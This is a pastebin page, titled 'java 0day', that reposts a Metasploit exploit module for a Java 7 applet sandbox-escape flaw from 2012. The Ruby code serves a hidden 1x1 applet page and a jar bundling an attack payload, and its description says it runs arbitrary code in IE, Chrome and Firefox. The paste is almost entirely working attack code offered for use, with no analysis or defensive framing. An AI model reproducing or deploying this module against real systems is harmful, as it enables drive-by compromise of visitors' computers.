Bugabuse.Net Pastebin

java 0day

From dan, 3 Years ago, written in Plain Text, viewed 87 times.
URL https://paste.bugabuse.net/view/86497944 Embed
Download Paste or View Raw
  1. ##
  2. # This file is part of the Metasploit Framework and may be subject to
  3. # redistribution and commercial restrictions. Please see the Metasploit
  4. # web site for more information on licensing and terms of use.
  5. #   http://metasploit.com/
  6. ##
  7.  
  8. require 'msf/core'
  9. require 'rex'
  10.  
  11. class Metasploit3 < Msf::Exploit::Remote
  12.     Rank = ExcellentRanking
  13.  
  14.     include Msf::Exploit::Remote::HttpServer::HTML
  15.  
  16.     include Msf::Exploit::Remote::BrowserAutopwn
  17.     autopwn_info({ :javascript => false })
  18.  
  19.     def initialize( info = {} )
  20.         super( update_info( info,
  21.             'Name'          => 'Java 7 Applet Remote Code Execution',
  22.             'Description'   => %q{
  23.                     This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary
  24.                 Java code outside the sandbox. This flaw is also being exploited in the wild, and there is
  25.                 no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome
  26.                 and Firefox across different platforms.
  27.             },
  28.             'License'       => MSF_LICENSE,
  29.             'Author'        =>
  30.                 [
  31.                     'Unknown', # Vulnerability Discovery
  32.                     'jduck', # metasploit module
  33.                     'sinn3r', # metasploit module
  34.                     'juan vazquez', # metasploit module
  35.                 ],
  36.             'References'    =>
  37.                 [
  38.                     #[ 'CVE', '' ],
  39.                     #[ 'OSVDB', '' ],
  40.                     [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
  41.                     [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]
  42.                 ],
  43.             'Platform'      => [ 'java', 'win', 'linux' ],
  44.             'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
  45.             'Targets'       =>
  46.                 [
  47.                     [ 'Generic (Java Payload)',
  48.                         {
  49.                             'Arch' => ARCH_JAVA,
  50.                         }
  51.                     ],
  52.                     [ 'Windows Universal',
  53.                         {
  54.                             'Arch' => ARCH_X86,
  55.                             'Platform' => 'win'
  56.                         }
  57.                     ],
  58.                     [ 'Linux x86',
  59.                         {
  60.                             'Arch' => ARCH_X86,
  61.                             'Platform' => 'linux'
  62.                         }
  63.                     ]
  64.                 ],
  65.             'DefaultTarget'  => 0,
  66.             'DisclosureDate' => 'Aug 26 2012'
  67.             ))
  68.     end
  69.  
  70.  
  71.     def on_request_uri( cli, request )
  72.         if not request.uri.match(/\.jar$/i)
  73.             if not request.uri.match(/\/$/)
  74.                 send_redirect(cli, get_resource() + '/', '')
  75.                 return
  76.             end
  77.  
  78.             print_status("#{self.name} handling request")
  79.  
  80.             send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
  81.             return
  82.         end
  83.  
  84.         paths = [
  85.             [ "Exploit.class" ]
  86.         ]
  87.  
  88.         p = regenerate_payload(cli)
  89.  
  90.         jar  = p.encoded_jar
  91.         paths.each do |path|
  92.             1.upto(path.length - 1) do |idx|
  93.                 full = path[0,idx].join("/") + "/"
  94.                 if !(jar.entries.map{|e|e.name}.include?(full))
  95.                     jar.add_file(full, '')
  96.                 end
  97.             end
  98.             fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb")
  99.             data = fd.read(fd.stat.size)
  100.             jar.add_file(path.join("/"), data)
  101.             fd.close
  102.         end
  103.  
  104.         print_status("Sending Applet.jar")
  105.         send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
  106.  
  107.         handler( cli )
  108.     end
  109.  
  110.     def generate_html
  111.         html  = "<html><head></head>"
  112.         html += "<body>"
  113.         html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
  114.         html += "</applet></body></html>"
  115.         return html
  116.     end
  117.  
  118. end
  119.  

Reply to "java 0day"

Here you can reply to the paste above

Powered by Stikked